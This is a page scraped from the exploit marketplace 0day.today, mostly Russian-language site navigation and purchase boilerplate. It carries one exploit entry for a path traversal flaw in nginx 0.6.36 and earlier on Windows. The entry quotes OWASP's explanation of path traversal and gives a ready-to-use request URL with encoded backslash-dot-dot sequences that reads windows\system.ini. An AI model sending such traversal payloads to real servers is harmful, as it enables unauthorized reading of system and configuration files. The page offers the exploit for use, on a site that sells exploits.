[ домой ]  [ private ]  [ 0Day ]  [ discount ]  [ Получить золото ]  [ платформы ]  [ пентест ]  [ поиск ]  [ faq ]  [ контакты ]  [ стиль ]  [ Prices in Gold ]   db: 39 443    
0day.today Exploit DB Official Facebook
0day.today Exploit DB Official Twitter
0day.today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - наибольшая база данных эксплоитов в мире.
Выберите Ваш язык:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Некоторые вещи, о которых стоит знать:

Мы используем один основной домен 0day.today

Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold).
We accept currencies: [contact admin to find more]
           
Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.

Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Я зарегистрированный пользователь 0day.today. Я не желаю видеть это окно в будущем.
С чего начать?
  1. Прочитайте [ соглашение ]
  2. Прочитайте [ Отправить ] правила
  3. Посетите страницу [ faq ] page
  4. [ Зарегистрируйте ] профиль
  5. Получите [ Gold ]
  6. Если Вы хотите [ продать ]
  7. Если Вы хотите [ купить ]
  8. Если Вы потеряли [ Счет ]
  9. Любые вопросы [ [email protected] ]


Основные ссылки


Вы можете связаться с нами по

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ Восстановление ]
Свяжитесь с нами
Вы можете связаться с нами по:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day.today магазин эксплоитов и 0day база данных эксплоитов

nginx [engine x] http server <= 0.6.36 Path Draversal

Автор
cp77fk4r
Риск
[
Security Risk Unsored
]
0day-ID
0day-ID-12459
Категория
remote exploits
Дата добавления
30-05-2010
Платформа
multiple
=====================================================
nginx [engine x] http server <= 0.6.36 Path Draversal
=====================================================


# Exploit Title: nginx [engine x] http server <= 0.6.36 Path Draversal
# Date: 20/05/10
# Author: cp77fk4r 
# Software Link: http://nginx.org/
# Version: <= 0.6.36
# Tested on: Win32
#
##[Path Traversal:]
A Path Traversal attack aims to access files and directories that are stored
outside the web root folder. By browsing the application, the attacker looks
for absolute links to files stored on the web server. By manipulating
variables that reference files with “dot-dot-slash (../)” sequences and its
variations, it may be possible to access arbitrary files and directories
stored on file system, including application source code, configuration and
critical system files, limited by system operational access control. The
attacker uses “../” sequences to move up to root directory, thus permitting
navigation through the file system. (OWASP)
#
http://localhost/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem.ini
#
#
[e0f]



#  0day.today [2024-07-02]  #
База данных эксплоитов разделена по типам эксплоитов (локальные, удаленные, DoS, PoC, другие.)
Отправляйте все пожелания на адреса mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team